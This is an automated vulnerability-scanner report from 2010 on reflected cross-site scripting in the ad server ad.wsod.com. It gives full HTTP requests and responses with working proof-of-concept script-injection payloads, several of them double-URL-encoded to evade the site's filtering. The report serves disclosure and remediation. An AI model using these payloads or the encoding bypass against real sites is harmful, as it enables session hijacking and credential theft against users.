ad.wsod.com, XSS, Cross Site Scripting, Ad CDN, CWE-79, CAPEC-86

Cross Site Scripting in ad.wsod.com | Ad CDN XSS | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Dec 19 11:58:50 CST 2010.


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 2]

1.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 2]

1.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 3]

1.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 3]

1.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [click parameter]

1.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [click parameter]

1.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [name of an arbitrarily supplied request parameter]

1.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [name of an arbitrarily supplied request parameter]

1.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459** [10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click parameter]

1.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459** [name of an arbitrarily supplied request parameter]

2. Cross-domain Referer leakage

2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**

3. Cookie without HttpOnly flag set

4. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 341f0%2522%253balert%25281%2529%252f%252fec65c3011ff was submitted in the REST URL parameter 2. This input was echoed as 341f0";alert(1)//ec65c3011ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357341f0%2522%253balert%25281%2529%252f%252fec65c3011ff/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2311

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357341f0";alert(1)//ec65c3011ff/1354.0.iframe.200x33/1292775952**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EX
...[SNIP]...

1.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e021%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa68640299b was submitted in the REST URL parameter 2. This input was echoed as 1e021"><script>alert(1)</script>aa68640299b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313571e021%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa68640299b/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2356

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313571e021"><script>alert(1)</script>aa68640299b/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05b5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec875a629f52 was submitted in the REST URL parameter 3. This input was echoed as d05b5"><script>alert(1)</script>c875a629f52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33d05b5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec875a629f52/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2356

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
82652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33d05b5"><script>alert(1)</script>c875a629f52/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd153%2522%253balert%25281%2529%252f%252ff1e7366b870 was submitted in the REST URL parameter 3. This input was echoed as dd153";alert(1)//f1e7366b870 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33dd153%2522%253balert%25281%2529%252f%252ff1e7366b870/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2311

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33dd153";alert(1)//f1e7366b870/1292775953**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRd
...[SNIP]...

1.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3905c"-alert(1)-"af2cb1f5414 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*3905c"-alert(1)-"af2cb1f5414 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2283

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*3905c"-alert(1)-"af2cb1f5414">
...[SNIP]...

1.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6373"><script>alert(1)</script>0bc461bd2a8 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*e6373"><script>alert(1)</script>0bc461bd2a8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2313

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*e6373"><script>alert(1)</script>0bc461bd2a8http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6fe8"><script>alert(1)</script>5c5871196e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*&d6fe8"><script>alert(1)</script>5c5871196e5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2319

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*&d6fe8"><script>alert(1)</script>5c5871196e5=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41c03"-alert(1)-"c95391720db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*&41c03"-alert(1)-"c95391720db=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:25:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2289

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*&41c03"-alert(1)-"c95391720db=1">
...[SNIP]...

1.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459** [10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28162'-alert(1)-'b1d917b4042 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

